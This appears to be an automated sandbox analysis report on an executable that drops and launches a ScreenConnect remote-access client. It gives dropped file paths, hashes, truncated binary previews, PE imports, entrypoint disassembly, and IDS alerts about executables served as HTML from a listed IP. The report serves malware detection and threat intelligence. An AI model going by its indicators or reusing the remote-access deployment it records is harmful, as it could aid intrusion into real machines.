                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                        MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                        SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                        SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                        SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                        Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                        MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                        SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                        SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                        SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YTQ2XNTD.5QH\1L9EZ96X.6J5.application

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):118229
                                                                                                                                                                                                                                                        Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                        MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                        SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                        SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                        SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):87
                                                                                                                                                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                        MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                        SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                        SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                        SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

                                                                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1121
                                                                                                                                                                                                                                                        Entropy (8bit):5.342215969645725
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
                                                                                                                                                                                                                                                        MD5:4F13BE23AEC301E86C0DE5CB433E8C51
                                                                                                                                                                                                                                                        SHA1:1E2D836615D5F58BE6F783DE3419B72145C67328
                                                                                                                                                                                                                                                        SHA-256:B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
                                                                                                                                                                                                                                                        SHA-512:C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ

                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                        Entropy (8bit):4.298812838499693
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:yECqOEmWfd+WQFqy/9026ZTyaRsCDusBqD5dooi8llSD6VJSRh+:fCLL6seqD5SMSWVARc
                                                                                                                                                                                                                                                        MD5:5A27AE1C5F900A7082FEDC0CCCF46543
                                                                                                                                                                                                                                                        SHA1:B750D499F128BFC9D5EB9C2DB15F91AB99ECC685
                                                                                                                                                                                                                                                        SHA-256:8132E692D69D057162E5C6CA97401435F96C811C50A6F941392CC2D5DC9B3E81
                                                                                                                                                                                                                                                        SHA-512:D8017B5345AC0C5E4A123851C3EB61C5EAC8EE11270F52A29CAA2A661D8D92B970CA0CF1539FD0491E35336930C8F7E838CC0FC7CC3FAB6B7280E0771132924E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...$.'..............................................................................................................................................................................................................................................................................................................................................s...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Entropy (8bit):6.515515121625994
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                        File name:96r3GgxntQ.exe
                                                                                                                                                                                                                                                        File size:83'360 bytes
                                                                                                                                                                                                                                                        MD5:1d59c17159ad086256e0c1c2c34666ae
                                                                                                                                                                                                                                                        SHA1:aaf33cf2f9e970a41535a556dc507e667288ac82
                                                                                                                                                                                                                                                        SHA256:a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f
                                                                                                                                                                                                                                                        SHA512:9f850455f91bd6a287e1d112bb0ce66da83fcb0f8ba301635668214e47115f7358f87a160ee5047db340077497bda3c81ce71d9f6bb3fc8b1d21cee144685ce8
                                                                                                                                                                                                                                                        SSDEEP:1536:+oG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdayPBJYYM7Dxh/:2enkyfPAwiMq0RqRfbayZJYYMv/
                                                                                                                                                                                                                                                        TLSH:9D835B53B5D18875E9730E3118B1E9B4593FBE110EA48DAF3398422A0F351D19E3AE7B
                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Entrypoint:0x401489
                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                        Time Stamp:0x6673118D [Wed Jun 19 17:12:45 2024 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                        Import Hash:37d5c89163970dd3cc69230538a1b72b

                                                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                        Error Number:0
                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                        • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                        • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                        Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                        Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                        Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                        Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                        call 00007FAB6CE8948Ah
                                                                                                                                                                                                                                                        jmp 00007FAB6CE88F3Fh
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                        call dword ptr [0040B048h]
                                                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                        call dword ptr [0040B044h]
                                                                                                                                                                                                                                                        push C0000409h
                                                                                                                                                                                                                                                        call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                        call dword ptr [0040B050h]
                                                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        sub esp, 00000324h
                                                                                                                                                                                                                                                        push 00000017h
                                                                                                                                                                                                                                                        call dword ptr [0040B054h]
                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                        je 00007FAB6CE890C7h
                                                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                                                        int 29h
                                                                                                                                                                                                                                                        mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                        mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                        mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                        mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                        mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                        mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                        mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                        mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                        mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                        mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                        mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                        mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                        pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                        mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                        mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                        mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                        mov dword ptr [00411810h], 00010001h

                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2da0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                        .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .rdata0xb0000x5d580x5e003a86bd3d8ffe94b1ebad64876c0f831cFalse0.4178025265957447Applesoft BASIC program data, first line number 14.842507933211541IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                        RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                        KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                        CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                        2024-10-25T19:27:31.624141+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1149784TCP
                                                                                                                                                                                                                                                        2024-10-25T19:27:33.427540+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1149796TCP
                                                                                                                                                                                                                                                        2024-10-25T19:27:38.892228+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1149834TCP
                                                                                                                                                                                                                                                        2024-10-25T19:27:40.793535+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1149844TCP
                                                                                                                                                                                                                                                        2024-10-25T19:27:42.998964+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1149859TCP
                                                                                                                                                                                                                                                        2024-10-25T19:27:47.138118+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1149880TCP
                                                                                                                                                                                                                                                        2024-10-25T19:27:48.713242+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1149891TCP
                                                                                                                                                                                                                                                        2024-10-25T19:27:52.315535+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1149910TCP

                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:21.478987932 CEST49727443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:21.479033947 CEST4434972779.110.49.185192.168.2.11
